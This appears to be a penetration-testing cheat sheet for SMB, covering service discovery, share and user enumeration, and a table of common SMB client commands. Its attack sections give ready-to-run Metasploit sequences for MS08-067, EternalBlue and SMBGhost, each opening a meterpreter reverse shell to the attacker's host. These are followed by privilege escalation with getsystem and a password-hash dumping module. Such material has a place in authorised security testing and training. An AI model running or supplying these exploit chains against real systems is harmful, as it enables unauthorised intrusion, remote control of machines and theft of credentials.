SMB (Server Message Block)
Default Port: 139, 445
SMB (Server Message Block), also known as CIFS (Common Internet File System), is a network protocol that allows for file sharing, network browsing, printing services, and inter-process communication over a network.
The SMB protocol provides you with the ability to access resources from a server.
Connect
In order to initiate the process, it's imperative to establish a connection to the Server Message Block (SMB) server.
To list all available shares on the target server, utilize the following command:
smbclient -L //target-ip
Recon
Network Scanning for SMB Services
Identify devices running SMB services within a target network.
# Nmap to discover SMB services
nmap -p 445 --open -sV <target-ip>
Identify SMB Version
Determine which SMB versions are running on target systems.
# Nmap script for SMB version
nmap --script smb-protocols -p 445 <target-ip>
Enumeration
For further enumeration, various tools such as enum4linux, smbmap, or the nmap scripting engine can be employed.
smbclient
Using smbclient to list shares
smbclient -L //192.168.1.100 -U anonymous
enum4linux
Using enum4linux for enumeration
enum4linux -a target-ip
smbmap
smbmap -H target-ip
nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target-ip
This command executes two scripts to enumerate shares and users from the target server.
Attack Vectors
In this section, we will discuss some prevalent attack vectors commonly encountered when dealing with Server Message Block (SMB).
SMB Null Session
A Null Session refers to an unauthenticated connection to an SMB server, providing the capability to gather significant information. Exploitation typically involves SMB connections over TCP ports 445 and 139.
Command to establish a Null Session connection:
rpcclient -U "" <target-ip>
SMB Signing
SMB signing, if not enabled, can be exploited, potentially allowing an attacker to conduct a man-in-the-middle attack.
To check for SMB Signing status:
nmap --script smb-security-mode.nse -p445 <target-ip>
MS08-067 (Netapi)
This vulnerability permits remote attackers to execute arbitrary code through a crafted RPC request.
Metasploit module for exploitation:
use exploit/windows/smb/ms08_067_netapi
set RHOSTS <TARGET-IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit
MS17-010 (EternalBlue)
This vulnerability enables remote attackers to execute arbitrary code via a crafted SMBv1 request.
Metasploit module for exploitation:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET-IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit
SMBGhost (CVE-2020-0796)
Target the SMBGhost vulnerability in SMBv3.
use exploit/windows/smb/cve_2020_0796_smbghost
set RHOSTS <TARGET-IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit
Post-Exploitation
Following successful exploitation, the post-exploitation phase is initiated, involving deeper investigation.
Gaining System Access
Upon successful exploitation, utilizing the Meterpreter shell facilitates gaining system access.
getsystem
Dumping Hashes
A Metasploit post-module can be employed to dump hashes.
use post/windows/gather/smart_hashdump
exploit
Common SMB Commands
| Command | Description | Usage |
|---|---|---|
smbclient | Connect to an SMB/CIFS server | smbclient //server/share |
smbget | Download files from an SMB/CIFS server | smbget smb://server/share/file |
smbpasswd | Change a user's SMB password | smbpasswd -r server -U username |
smbstatus | Display information about SMB connections | smbstatus |
smbtree | List SMB/CIFS shares on a network | smbtree |
mount -t cifs | Mount an SMB/CIFS share | mount -t cifs //server/share /mnt/point |
umount | Unmount an SMB/CIFS share | umount /mnt/point |